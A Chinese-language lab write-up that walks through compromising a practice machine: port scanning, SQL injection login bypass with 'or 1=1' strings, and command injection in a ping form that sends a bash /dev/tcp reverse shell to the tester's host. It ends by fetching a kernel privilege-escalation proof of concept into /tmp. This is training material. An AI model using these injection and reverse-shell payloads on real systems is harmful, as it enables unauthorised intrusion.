目录

环境配置

端口扫描

漏送发现

漏送利用

提权（内核漏洞提权）

---

环境配置

环境配置的过程同主页该专栏第一个靶场，不在赘述。

端口扫描

首先通过arp-scan并根据靶机的mac地址确定靶机的IP地址

然后对靶机进行一个扫描

首先扫描到OpenSSH 3.9p1 (protocol 1.99)，这个是什么意思呢？

Openssh是一个使用ssh协议进行通信的软件，3.9p1是他的版本号，后面的ptotocol表示openssh所支持的ssh版本1和版本2.

Apache就不用多说了，中间件嘛

111端口的rpcbind服务是rpc服务的守护进程，也就是服务端，而2应该是他的版本，#100000表示rpc程序服务编号为100000。

623端口开放的服务为status，这个跟NFS协议有关，status是NFS RPC服务的一部分（而NFS协议，客户端和服务端之间的通信是通过RPC协议来进行的。），如果开放了这个服务的话可以看一下有没有NFS协议，如果有的话可以看一下存不存在NFS共享信息泄露。这里不存在。

631端口开放的ipp是一种允许计算机通过网络进行打印的协议，而CUPS是一个用于管理打印任务的软件系统，1.1是版本号，

3306的mysql就不用多说了，数据库。

漏送发现

由于这里发现nmap扫描到MySQL存在未授权登录，尝试登录一下，提示我的IP不能登录，判断应该靶机设置的只能本机登录。

利用hydra爆破一下ssh和mysql，当然也是不行的（预料之中）

根据nmap扫到的

利用dirsearch进行一下目录扫描

在扫描目录之前也通过nmap得到的版本号，通过searchsploit进行历史漏洞的搜寻，无果。

访问一下扫描到的manual/index.html，好像没有什么用处

由于靶机开启了http服务，直接访问，可以看到是一个登录框，遇到这里一般可以测一下爆破和注入。因为我们是需要拿权限，所以这里XSS之类的就不测了。

漏送利用

直接用最常用的万能密码尝试绕过登录验证，直接就绕过了。

账号：root ' or '1' = '1

密码：root ' or '1' = '1

bp抓一下包，在框里填什么，它都会去帮你ping，那明显就可以利用管道符让他帮我们执行命令（感觉这里跟CTF比较像）

这里尝试读取密码，读取不成功，考虑到对某些命令进行了过滤，于是我尝试了很多中下载命令，但是都不行，base64编码和url编码也是不行，于是尝试在kali上面利用python开启http服务，在这里利用wget去下载后门，也是不行。

索性用插件生成一个反弹shell的命令，然后直接反弹。

这里执行命令

127.0.0.1 | bash -c 'exec bash -i &>/dev/tcp/192.168.253.145/6666 <&1'

提前监听6666端口，也是成功的反弹了shell，权限是低权限，尝试提权。

提权（内核漏洞提权）

首先查看一下linux内核版本，以及操作系统是什么发行版，搜集一下信息。

内核版本是2.6.9，发行版是centos4.5

根据内核版本去搜一下漏洞，类型为本地的就一个，但是版本也不符合

地址：Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

通过发型版本去搜一下，刚好有一个提权漏洞。版本符合。先将POC下载到本地，然后在kali上开启http服务，在靶机上下载下来。

Python起http服务

这里在有两个问题，因为在打靶机的时候使用了bp，默认监听8080端口，那使用python开启http服务时默认也是8080端口，会提示启动不了。可以换个端口

第二个就是在下载C文件时会提示没有权限写入，然后不断换目录去下载，一直不行，最后到tmp目录下载成功。

这里tmp目录可以写入是因为他是存放临时文件的目录，一般所有用户都可以读取和写入。